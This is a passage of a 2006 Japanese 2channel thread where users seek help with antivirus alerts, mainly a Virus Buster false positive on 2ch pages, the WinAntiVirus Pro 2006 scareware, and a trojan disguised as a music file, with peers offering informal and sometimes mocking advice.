足りない情報等がありましたらお答え致しますので、ご回答よろしくお願いします。
(一応netでは調べて見ました)


552 :名無しさん@お腹いっぱい。:2006/04/12(水) 01:54:43
>>551
ttp://www.trendmicro.com/jp/security/hcall/overview.htm
トレンドマイクロ

ttp://www.pandasoftware.com/activescan/jp/activescan_principal.htm
パンダ


オンラインスキャンでもしてみたら?

553 :名無しさん@お腹いっぱい。:2006/04/12(水) 02:00:41
>>548
この板にWinFixerのスレあるからそこを参照するといいよ

554 :名無しさん@お腹いっぱい。:2006/04/12(水) 08:03:35
>>550
BIOSで設定を変える。
FDISKでHDDの状態を確認する。
HDD、マザーを交換する。

555 :551:2006/04/12(水) 08:15:32
552さん>返信ありがとうございます。
オンラインスキャンでは引っかかりませんでした。
これで安心してもいいんでしょうかね・・


556 :あい:2006/04/12(水) 14:09:25
なんかウイルスが消しても消しても出てくる。
どうしよう、どうしたらいい?

助けてください。なんか5回ぐらい消したんだけど、また出てきそう。
どこかのファイルがおかしなことされてるのかなぁ・・・。
でもリなんとかしたら、中のデータ全部消えちゃうし、どうしたらいいの?

557 :あい:2006/04/12(水) 14:11:30
誰か助けて・゚・(つД`)・゚・
どうしたらいいのか教えてください。

558 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:12:39
>>556
なんというウイルスよ?


559 :あい:2006/04/12(水) 14:13:11
ファイル名l50(2)htm 元の場所C¥Documentsってなってます。
どうしたらいいんですか?

560 :あい:2006/04/12(水) 14:13:50
ウイルス名は HTML MHTREDIRGMです。

561 :あい:2006/04/12(水) 14:15:46
また出てきたーどんどん来るーこれ感染してるから、
ネット切断しても、電源切って、コンセント抜いても無意味ですよねぇ?

562 :あい:2006/04/12(水) 14:17:43
誰かー誰かー・゚・(つД`)・゚・

563 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:18:57
さっきから自分もなってる
2ちゃんねるのスレッド開くと検出。
専ブラだと大丈夫な見たい。ソフトはウイルスバスターの2005

ノートン誤検出みたいなトラップの類かも。

564 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:20:10
>>563
トレンドマイクロのウイルスデータベースには
そんな名前のウイルス載ってないみたいだぞ。

565 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:21:08
漏れもさっきから2chしてたらどんどん入って来る
何じゃコレ

566 :あい:2006/04/12(水) 14:21:32
>>563 そ、それで大丈夫なんですか?このままほっといたら、
10分後にはウイルスまみれになってるのでは??
私はウイルスバスター2004かな・・・。
ノートンとかよくわからないです、初心者でごめんなさい・゚・(つД`)・゚・
また出てくるう・゚・(つД`)・゚・怖いよお。
これ、PCの中身壊してるんじゃ・・・。

567 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:21:54
HTML MHTREDIRGMってどこの登録名よ?
わかんねーからデスククリーンアップしてから
PCスキャンかけてみな

568 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:23:53
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_MHTREDIR.G
これの亜種?

569 :あい:2006/04/12(水) 14:25:22
>>567 クリーンアップって?中身綺麗にすることですか?
スキャンは仕方がよくわからないのですが、バスターはかかってます。
そして、今ウイルスを隔離しまくってる状態です。
怖いー。

570 :あい:2006/04/12(水) 14:26:58
最新の情報をクリックして、リロードしたとたんに来ることが判明。
クリーンアップしたら、マイピクチャとか綺麗になくなりますよね?困る・・。
今手元に、データーをうつせるようなのも無いし、どうしたらー・゚・(つД`)・゚・

571 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:28:32
>>570
そんなに慌てなくてイイヨ。
大したもんじゃなさそうだから、もう少し様子を見なさい。

572 :あい:2006/04/12(水) 14:28:43
ウイルス超!来るー・゚・(つД`)・゚・
怖いー怖いーこれほっといて大丈夫じゃないですよね?
皆さんはどうしてるんですか?スレ開くたびに、ウイルス来てる・・。

573 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:28:58
>>567
トレンドマイクロ
検出は2chのスレッドをIEで開いた瞬間(専ブラは無反応)
検出はされるがトレンドマイクロのHPのデータベースには記述なし。

タイプ的にはノートンの誤検出に似てる。

あと、スキャンしてるがIEのキャッシュから同名のウイルスを数個検出。

574 :あい:2006/04/12(水) 14:29:45
>>571 レスありがとうございます。
これひろゆきさんの仕業ですかね。だとしたらヒドイ・・。
それとも2ちゃんをつぶそうとする輩の仕業?
もう寝たいのに、寝れない・・・。

575 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:30:28
誤検出の可能性が高いからね。
しばらく待つのがよい。

しかしウザいなこれ。

576 :あい:2006/04/12(水) 14:32:05
何度も出てくるし、邪魔ー・゚・(つД`)・゚・
ヤメテードイテーコナイデー・゚・(つД`)・゚・

577 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:33:58
>>575

スキャンかけたらウイルス検出1096・・orz
リロードする度に警告でまくりだし

新手の広告かよ!

578 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:34:18
バスターがまともに動くのこれが初めてなんで驚いたな・・・・


579 :あい:2006/04/12(水) 14:34:53
>>577 多すぎ!スキャンってバスターと同じですか?
初心者ですみません。

580 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:41:52
>>579
Temporary Internet Filesの中身を空にしろって、
クリーンインストールしろって言ってんじゃないよ
2chで出るんだから一旦退避してPC自体を
スキャンしてみたら?

581 :あい:2006/04/12(水) 14:44:23
>>580 専門用語難しい('A`)
どうすればいいのか全くわかりまへん。

582 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:44:55
>577
漏れは15個くらいだったなあ。

>579
バスターでスキャンされているんじゃないでしょうかね。


どうしても気になるんだったら専ブラかFireFox辺りでこのスレみるといいんかね。

583 :あい:2006/04/12(水) 14:48:58
http://q.pic.to/1dpcy
こんなんが何度も出るー。
>>582 なら大丈夫ですかね?専ブラはもってないし、ファイルフォックスもわかりまへん。
わからないだらけですみません・゚・(つД`)・゚・

584 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:50:26
>>583の頭もファイルしているらしい

585 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:50:45
>>581
2ch離れて本でも読んで、専門用語とやらを勉強しろ

586 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:51:04
>>581
システムツール→デスククリーンアップ
だから、止まらないなら2chから離れなよ(www

587 :あい:2006/04/12(水) 14:51:27
私の頭もファイル中??意味がわかりまへん。

588 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:51:33
スレッド開くたびにガンガン出るじゃん

589 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:51:59
出てこないんだが、なぜだ

590 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:52:10
HTML MHTREDIRGMってのが、2chのスレッドを
開くと何度も何度も検出されて……って書き込もうとしたら同様の
症状が何人かの人にも出て居るみたいで……。これって何か
ヤバいんでしょうか?今朝2chに来たら突然こんな状態になってしまって参ってます

591 :あい:2006/04/12(水) 14:52:37
>>586 ご親切にありがとうございます!
クリーンアップしたら、ピクチャの中身も綺麗に削除されちゃいますかね?

592 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:53:32
横レススマソ
オレもさっきから、昨日までは何の反応も無かったスレで
html_mhtredirgm検出されまくってる
だがバスターの検索結果は感染0
html_mhtredirならトレンドマイクロにあったがこれの亜種?


593 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:54:00
>>590
今朝からならやばいかも。

午後1時以降にウイルスバスターのパターンファイルをアップデートしてから
だったら語検出だと思われる。そのうち対策されるだろうからおとなしく待つべし。

594 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:54:08
>>589
専ブラだから?

595 :あい:2006/04/12(水) 14:55:38
とりあえず、これほっといて、PCの電源切って、寝ても大丈夫ですかね?

596 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:55:44
>>591
Netのゴミだけだから(w
いい加減ここから離れてウィルスチェックに
専念しなよ(wwwwwwww

597 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:56:41
>>595
大丈夫と思われます。
気にしすぎないのが良い。
誤検出ならそのうちにトレンドマイクロで対応するかも。


598 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:56:41
全然大丈夫

599 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:58:26
>>593
ああ、そういえば2chに来たのは1時以降でした。
ウィルスバスターのアップデートがおかしかったって事なんですかね

600 :あい:2006/04/12(水) 14:58:52
>>596>>597>>598 ありがとうございます。

でも何で皆そんな余裕なの(;´д`)
私一人だけ焦りまくりで恥ずかしい・・・。

601 :名無しさん@お腹いっぱい。:2006/04/12(水) 14:59:24
>>599
そういうこと。

パターンファイルのミスだ。そのうち修正リリースされる。

602 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:00:03
>>592
バスターでのHTML_MHTREDIR.Gの亜種っぽい?

603 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:01:09
>>あい
ウイルスバスターが次回のアップデートを行うまで
2chには来ないで寝てろ。

つぎ起きたときには、ウイルスバスターのアップデートが走るよ。
んで、ウイルス警告は出なくなる。

んじゃおやすみね。


604 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:02:14
おもしろかったのになぁ

605 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:02:53
>>601
なるほど、どうもです。

606 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:03:11
なんで漏れだけ検出1000以上もあったんだろう?
リロードしまくったからかな?

607 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:03:29
全然大丈夫ウザイだけ
ちなみに

>>123 ←これはテスト

を開くとウイルス名が123になってると思う

608 :あい:2006/04/12(水) 15:04:39
>>603 はぁい('A`)寝ます。おやすみなさい。
皆さん親切に答えてくださって、本当にありがとうございました。
多分また来ると思いますが、そのときもお願いします。頼みます。
一人うるさくてすみませんでした。

609 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:04:42
>>607
ウイルス名じゃなくて、ファイル名だろw

610 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:06:54
>>609
さすがの反応

ありがとう

611 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:07:05
>>590
    自分もその状態。今、スキャンしながら書き込んでるが、
    スキャン状態でもウィルスに感染しまくってるようだ。

612 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:13:40
HTML MHTREDIRGM

おおっ本当だIEで開くと出てきた。
2chブラウザだと出ないんだな。

613 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:35:29
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<base href="http://pc8.2ch.net/sec/">
<title>ウィルス情報質問 総合スレッド★Part35</title>
<script type="text/javascript" defer>
<!--
function l(e){var N=g("NAME"),M=g("MAIL"),i;with(document) for(i=0;i<forms.length;i++)if(forms[i].FROM&&forms
[i].mail)with(forms[i]){FROM.value=N;mail.value=M;}}onload=l;function g(key,tmp1,tmp2,xx1,xx2,xx3,len){tmp1=" "+document.cookie+";";xx1=xx2=0;len=tmp1.
length;while(xx1<len){xx2=tmp1.indexOf(";",xx1);tmp2=tmp1.substring(xx1+1,xx2);xx3=tmp2.indexOf("=");if(tmp2.substring(0,xx3)==key)return unescape(tmp2.substring(xx3+1,xx2-xx1-1));xx1=xx2+1;}return "";}
function be(i){var w=window.open('http://be.2ch.net/test/p.php?i='+i+'&u=d:'+document.URL);if(w)w.focus();}
//-->
</script>
</head>
<body bgcolor=#efefef text=black link=blue alink=red vlink=#660099>
<a href="http://ofuda.cc/"><img width="400" height="15" border="0" src="http://e.ofuda.cc/disp/1001000000010000/00813400.gif" ALT="無料アクセスカウンターofuda.cc「全世界カウント計画」"></a>
<script type="text/javascript" src="http://www.ff.iij4u.or.jp/~ch2/bohe.js"></script><br><br>

614 :613:2006/04/12(水) 15:36:43
とりあえずこれには引っかかるんだよね(´・ω・`)

615 :名無しさん@お腹いっぱい。:2006/04/12(水) 15:50:51
>>あい

ほれ、大丈夫だったよ
ってお休み中か・・・

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_MHTREDIR.GM

616 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:08:43
マルチですが・・・
ウィルスバスター
5時ごろ3.339.00リリースで対応するそうです。○
マジレスです。今、電話で聞いた。

617 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:10:39
>>616
d

618 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:29:00
119 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:22:29
Pattern Version: 3.339.00
Release Type: Irregular Release
Notes:

April 11, 2006, 20:05:13 (GMT -08:00)

---------------------
New Virus Detected:
---------------------

キタ━━━━━━(゚∀゚)━━━━━━!!!


619 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:34:46
3.339.00で動作確認もおk
ウィルスバスター使用の方はアップデートを

620 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:45:54
直ったぁあああ。情報くれた方ありがとうございました。

621 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:50:35
TROJ_DROPPER.AXO に感染しました。
みなさんはいかがですか?
これってどんなウイルスなんですかね?

622 :名無しさん@お腹いっぱい。:2006/04/12(水) 16:55:06
トロイです

623 :名無しさん@お腹いっぱい。:2006/04/12(水) 18:03:21
注意!!!!!

[シングル] (2006.01.18) 平原綾香 - 誓い.mp3.zip
は山田オルタを作成するぞ

平原綾香 - 誓い.mp3 (空白)_.exeは実行するなよ
中身は、TROJ_DROPEAMIだ

624 :名無しさん@お腹いっぱい。:2006/04/12(水) 18:05:48
>>623
普通、exeなんてむやみに実行しないから問題なし

625 :名無しさん@お腹いっぱい。:2006/04/12(水) 18:52:28
>>623
平原嫌いだから問題ナス


626 :名無しさん@お腹いっぱい。:2006/04/12(水) 20:09:40
解凍中にちゃんと中身のファイル名が表示されていれば
フォルダに偽装したexeの危険性はありませんか?

627 :名無しさん@お腹いっぱい。:2006/04/12(水) 20:15:53
>>626
ちゃんと拡張子を表示させて確認してから
解凍してるなら良いのでは?

解凍した中にexeが入ってる場合もあるが。

628 :名無しさん@お腹いっぱい。:2006/04/12(水) 20:32:53
>>627
んー、というと多分大丈夫ということでしょうね
ありがとうございました

629 :名無しさん@お腹いっぱい。:2006/04/12(水) 20:48:26
>>625
平原顔デカイよなw

630 :バスター・IE使い:2006/04/13(木) 01:45:36
バスターの HTML_MHTREDIR.GM の件なんですが、
警告が出たので、手動でウィルス検索したら「隔離できません」が2個出て、
ログ見るとウィルス名が、1個は空欄、2個目はHTML_MHTREDIR.GM。
その後、ADSLのケーブルを繋ぎ直したり、手動でアップデ−トしたりした後で、
手動でウィルス検索したら、ウィルスの検出はなし(0個)。
これで大丈夫なんでしょうか?
みなんさんと状況がちょっと違うようなので心配です。
もしかして、ファイヤーウォールはバスターのものではなく、
ウィンドウズのほうを入れてるからですか??
(ノートンでオンラインチェックしようと思ったら、
アクティブX入れなきゃならないので面倒なんです・・・。)

631 :あい:2006/04/13(木) 03:44:43
>>615 ありがとうございます。ってか誤警告・・・。
私のびびりっぷりは一体・・・。

632 :名無しさん@お腹いっぱい。:2006/04/13(木) 14:11:55
>>630
おれも結構あったがそれも全然タイチョープ

633 :名無しさん@お腹いっぱい。:2006/04/13(木) 14:44:31
私も誤検出の事で聞きたいのですが、隔離されたファイルは全部元に戻すの処理で
問題無いんですよね?

それと、1個だけファイルを削除してしまったのですがDocuments and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5〜なんたら
って言うファイルだと思うのですが、削除によって何か問題が発生してしまうでしょうか?


634 :名無しさん@お腹いっぱい。:2006/04/13(木) 14:47:07
>>633
もともとIEのキャッシュファイルなので、削除してしまっても何ら問題ありません。

635 :633:2006/04/13(木) 16:15:05
>>634
ありがとうございます。安心しました。

636 :名無しさん@お腹いっぱい。:2006/04/13(木) 16:46:33
MSMNS8.EXEていうのが、スタートアップにいて、こいつをブロックするとネットに繋がりません。
リカバリかけてもいつのまにかいて、困ってます。
ググっても、海外で少しヒットするだけやし。


637 :名無しさん@お腹いっぱい。:2006/04/13(木) 19:03:24
>>636
MSMNS8に該当するページが見つかりませんでした。

検索のヒント

638 :名無しさん@お腹いっぱい。:2006/04/13(木) 19:04:43
>>636
それがあることで何か不都合はあるのですか?

639 :630:2006/04/13(木) 19:13:08
>>632
そうなのですか、どうもありがとう!

640 :名無しさん@お腹いっぱい。:2006/04/13(木) 21:41:13
ネットしてたら、突然「警告」とか言って
http://amaena.com/securityworm5/jp/?aid=adtiger-jp&lid=jp
こんなページが出てきた。
このページ自体が怪しそうなんだけど、何なの?

641 :名無しさん@お腹いっぱい。:2006/04/13(木) 21:54:02
>>640
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (4)
注意!逃げウィンドウを発見! (1)

642 :名無しさん@お腹いっぱい。:2006/04/13(木) 22:00:39
>>640
「ブラックウォーム」---->「ブラックワーム」 暖かくてどうすんだよ?
日本語も変

643 :名無しさん@お腹いっぱい。:2006/04/13(木) 22:39:50
>>640
http://pc8.2ch.net/test/read.cgi/sec/1143972325/
WinAntiVirus Pro 2006


詳しくはこちらへ

644 :640:2006/04/13(木) 23:07:45
親切な方たち、ありがとう。
こんなものがあったとは知りませんでした。
これは、ダウンロードしなければ無害なんですよね?

645 :名無しさん@お腹いっぱい。:2006/04/14(金) 02:26:05
exe踏んでしまって、無理なポインタ操作と出たんだが、何かに感染してるかな?
とりあえず、avast!でウイルススキャンして、オンラインスキャンも何も出なかったんだが。

646 :名無しさん@お腹いっぱい。:2006/04/14(金) 03:12:54
ここはエスパースレじゃないと

647 :名無しさん@お腹いっぱい。:2006/04/14(金) 07:13:17
>>645
うん

648 :636:2006/04/14(金) 08:15:28
不具合は通信を遮断するとネットに繋がりません。。
日本語のページではヒットしません。


649 :名無しさん@お腹いっぱい。:2006/04/14(金) 11:39:56
最近エクスプローラー閉じていても勝手に海外のアダルトサイトが開かれます。
あとクリックしかしてないのにダブルクリックになったり、
ホームをいくらヤフーに設定しようがいつの間にか意味のわからない海外のページに設定が変えられていたりします。
どう対策したらよろしいでしょうか?

650 :名無しさん@お腹いっぱい。:2006/04/14(金) 13:44:24
>>648
>>637


651 :名無しさん@お腹いっぱい。:2006/04/14(金) 13:45:19
>>649
対スパイウェアで駆除

652 :名無しさん@お腹いっぱい。:2006/04/14(金) 18:55:24
>>651
スパイボットとシマンテックはありますがだめでしょうか?両方ともスキャンしても何も発見されません。
発見した場合は削除ですよね?あとリカバリーのことがよくわかりません。

653 :名無しさん@お腹いっぱい。:2006/04/14(金) 19:25:19
昨日の夜のことです。
tp://www.ampulove.com/
↑のサイト(このページまでは問題ないかと思われます)の日本国旗の
バナーをクリックし日本語サイトを開いたところ、○○があなたのパソコンに
入りました。「あなたの個人情報が他のパソコンに流される恐れがあります
」というような文(すいませんうろたえて閉じちゃったのでうろ覚えです)と
IPやらホストやらが表示されていました。
それに加え、「このウィルス駆除ソフトでは対処できないので以下のソフト
をインストールするように」というような文が。
これは何らかのウィルスに感染したということでしょうか。

【使用OS】ウィンドウズXP
【WindowsUpdateしてるか】自動更新になってるはず。
【AntiVirusは何を使っているか】マカフィー
【ちゃんとUpdateしてるか】自動更新になってるはず。
【スキャンした結果(ウイルス名・発見場所)】なにも検出されず。
【別のオンラインスキャンしたならその結果は】トレンドマイクロ。何も
検出されず。
【症状を具体的に、分かる限りすべて書く】今のところなし。
【何をしたらそんなことになったのか】上記
【これまでにとった措置】自動更新設定はしてあるはずなのですが、一応
マカフィー更新とWindowsUpdate、スパイボットの更新をしてから、マカフィー
とスパイボットとトレンドマイクロオンラインスキャンでスキャン。
【その他の質問】今、マカフィーとスパイボットとスパイウェアーブラスター
を入れているのですが、これで充分ですか?

654 :名無しさん@お腹いっぱい。:2006/04/14(金) 19:37:56
WinAntiVirus Pro 2006
http://pc8.2ch.net/test/read.cgi/sec/1143972325/


655 :名無しさん@お腹いっぱい。:2006/04/14(金) 19:47:46
>>652
Winfixで検索

656 :名無しさん@お腹いっぱい。:2006/04/14(金) 20:55:09
>>655
検索しましたがこれがなんですか?

657 :名無しさん@お腹いっぱい。:2006/04/14(金) 21:19:34
喧嘩うってんのかてめー

658 :名無しさん@お腹いっぱい。:2006/04/14(金) 21:37:17
>>657
winfixが悪質なスパイウェアですよね?
それと自分の質問がどう関係してます?


659 :名無しさん@お腹いっぱい。:2006/04/14(金) 21:51:31
これじゃねーの?
ttp://enchanting.cside.com/security/cwshredder.html

660 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:35:17
質問です
どうやらウイルスに感染した模様で、まぁその駆除はしたんですが、
完全に駆除したかイマイチわからなくて。
レジストリに変なのが追加されちゃってたり、というのを聞いて
でもどれが正常ので、どれが追加された奴かおれには判別できないので
すが、クリーンアップしたほうがよいですかね?

661 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:42:46
確実なのはクリーンインスコだろうね。

662 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:47:19
>>そうですか

その場合って、外付けHDDに、消したくない音楽ファイルだのを
移してからで平気ですか?移しちゃいけない(それ自体にも観戦してる可能性のある
ファイルってどんなものがありますか?)

663 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:50:24
お尋ねしても宜しいでしょうか。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。
【スキャンした結果(ウイルス名・発見場所)】 発見できない。
【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出
【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。
【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。
セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは
情報の流出を防ぐ事ができないと言われた。
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。

664 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:53:37
>>658
「何も発見されません」なら悪質なスパイウェアですよね?
発見した場合は「普通は」削除ですよね?
あとリカバリーのことがよくわかりませんでしたら、取説に書いてありませんか?
>>663
つttp://7899.hito.thebbs.jp/Madam/1141793533

665 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:56:14
>>663
http://pc8.2ch.net/test/read.cgi/sec/1143972325/
WinAntiVirus Pro 2006

666 :名無しさん@お腹いっぱい。:2006/04/14(金) 22:59:40
>>664
え、それってあの、僕もしかして騙されたってことですか?
当にクレカで買ってしまったんですけど、大丈夫ですかねえ?
やっぱりクレカの契約とか破棄する以外、対策は無いの?

667 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:05:08
とりあえず明日、対策を取ってみます。
ありがとう。

668 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:06:35

   ∩ _ _ ≡=−
   ミ(゚∀゚ ) ≡=−あ〜りゃりゃこりゃりゃ
    ミ⊃ ⊃    ≡=−
     (⌒ __)っ   ≡=−
     し'´≡=−
  −=≡    _ _ ∩
 −=≡   ( ゚∀゚)彡  あ〜りゃりゃこりゃりゃ
−=≡   ⊂  ⊂彡
 −=≡   ( ⌒)
  −=≡  c し'

669 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:16:07
>>663
>【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006

吹いたwwwwwwwwwwwwww

670 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:19:59
先ほど、シマンテックウイルス無料診断で
「Macro.src(マクロ・エスアールシー)」に感染してますって
出ましたけど、何かパソコンに悪影響がありますでしょうか?
因みに
【OS】ウィンドウズ98
【UPDATE】週一で豆に・・現在最新状態です。
現在ウイルスバスターソフト無しです。

よろしくお願い致します。

671 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:22:59
>>670
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1237018

ここにも書いてあるけど誤検出じゃないかな。

672 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:24:38
>>671
ありがどうございます、見てみます。

673 :名無しさん@お腹いっぱい。:2006/04/14(金) 23:49:42
WinAntiVirusでVirus駆除している人のスレはここですか?

674 :名無しさん@お腹いっぱい。:2006/04/15(土) 00:18:54
>>663

(´・ω・`)テラバカス

675 :名無しさん@お腹いっぱい。:2006/04/15(土) 00:20:17
>>663
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。
お前アホって言われてるだろ

676 :名無しさん@お腹いっぱい。:2006/04/15(土) 00:43:56
        /         /.    │    ヽ          \
  ∧ ∧/          /.     │     ヽ         ∧\∧
 (  ⌒ ヽ           /      │      ヽ        (  ⌒ ヽ
  ∪  ノ          /      │      ヽ         ∪  ノ
  ∩∪∩          /   ..   .. │       ヽ        ∩∪∩
 (・∀・| |  ミ      /   .    │        ヽ       (・∀・| |
  |     |      ∧ /∧ ..   ..  │       ∧ヽ∧  彡  |     |
⊂⊂____ノ  ミ   (  ⌒ ヽ  .... ..  .│       (  ⌒ ヽ   ⊂⊂____ノ
            ∪  ノ .ミ.   ∧│∧  彡   ∪  ノ
            ∩∪∩    (  ⌒ ヽ     ∩∪∩
            (・∀・| |     ∪  ノ     (・∀・| | 彡
            |     | ミ   ∩∪∩      |     |
          ⊂⊂____ノ     (・∀・| | 彡  ⊂⊂____ノ
                     |     |
                   ⊂⊂____ノ

677 :名無しさん@お腹いっぱい。:2006/04/15(土) 01:09:04
>>663
おまい、どこで世界最強の・・・と聞いたの? テラワロス

あの最低の日本語翻訳HPを見てか? ハゲワロス

まあ、確かに自らスパイウエアを潜り込ませる悪辣な業としては 世 界 最 強 !!! かもな ゲラプッ


678 :名無しさん@お腹いっぱい。:2006/04/15(土) 01:13:51
>>663はおもしろコピペとして保存しておこう・・・

679 :名無しさん@お腹いっぱい。:2006/04/15(土) 01:41:13
>>664
今考えると全然アップデートしてなかったです。
アップデートした後にスキャンすると凄い数がでてきました笑
どうにかなりそうかも・・・

680 :名無しさん@お腹いっぱい。:2006/04/15(土) 16:56:40
どなたか>>653わかる方いらっしゃいませんでしょうか

681 :名無しさん@お腹いっぱい。:2006/04/15(土) 17:02:31
単なるハッタリでしょ

682 :名無しさん@お腹いっぱい。:2006/04/15(土) 17:34:30
>>680
>>663


683 :名無しさん@お腹いっぱい。:2006/04/15(土) 17:35:31
【使用OS】 win xp pro
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 自動アップデートです
【スキャンした結果(ウイルス名・発見場所)】 troj_purity.k 場所は覚えてません
【別のオンラインスキャンしたならその結果は】 現在検索中です。
【症状を具体的に、分かる限りすべて書く】ネットに繋ぐとHDDの容量が減ります。(データが増える。)
【何をしたらそんなことになったのか】 海外のパッチソフトを実行したら感染しました。

【これまでにとった措置】 ウイルススキャン、spybot
【その他の質問】

よろしくお願いします。

684 :名無しさん@お腹いっぱい。:2006/04/15(土) 17:56:22
>>683
つttp://www.sophos.com/virusinfo/analyses/trojpurscanat.html
わからなければリカバリ

685 :653:2006/04/15(土) 18:20:11
>>682
どういうことですか?


686 :名無しさん@お腹いっぱい。:2006/04/15(土) 18:22:00
>>683
解決しました。
ありがとうございます。

687 :名無しさん@お腹いっぱい。:2006/04/15(土) 18:22:43
アンカーミス
× >>683
○ >>684

688 :名無しさん@お腹いっぱい。:2006/04/15(土) 18:29:03
>>685
ttp://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=WinAntiVirus+WinAntiSpyware+WinFixer&lr=lang_ja

689 :名無しさん@お腹いっぱい。:2006/04/15(土) 18:33:05
>>685
>>663-の動向を読み直せば解かるはず
解からないときは気にしなくていいよ


690 :名無しさん@お腹いっぱい。:2006/04/15(土) 18:54:49
【使用OS】 win xp home edition
【WindowsUpdateしてるか】してません
【AntiVirusは何を使っているか】 ノートン2006
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 異常なしでした
【別のオンラインスキャンしたならその結果は】 現在検索中です。
【症状を具体的に、分かる限りすべて書く】何もしていないのに、シマンテック社の電子メールプロキシで
「電子メールメッセージ (送信先は xxx、件名は xxx) を送信できませんでした。メールサーバーに対する接続が中断したためです。電子メールクライアントを開いてメッセージ送信フォルダからメッセージを再送してください。」
というメッセージが表示されます。
いろいろ検索しましたが解決方法がわかりません。
ウィルス対策ソフトはノートンの2006でシステムの完全スキャンをしても何も引っかかりません。
【何をしたらそんなことになったのか】 先日2ちゃんねるに書き込みをしましたがそれが原因なのか分かりません
【これまでにとった措置】 ウイルススキャン
【その他の質問】

よろしくお願いします。


691 :名無しさん@お腹いっぱい。 :2006/04/15(土) 19:01:50
うちはパソコン70台くらいの中規模ネットの会社なんだけど、
社内でWinnyやってる奴がいた。
「無料で音楽とか映画がダウンロードできるんだ」とか
言ってて、そいつが使ってたパソコンが2台連続して、
ウィルス感染、OSを入れ変えても不安定になり、
パソコン2台廃棄なんてしてたので、ピンときた。
捨てられちまったので確認できないけど。
経営者はIT音痴。
セキュリティに予算を出せと言っても、理解なし。
アホ経営者には、勝手にしろとしか言いようがないか。

692 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:10:21
>>691
で、質問はなにかね、ヘルペス君?

693 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:15:58
あえて、質問するなら、
社内でWinnyおよびそれに類するものを
検閲、排除する方法は現時点でありますか?

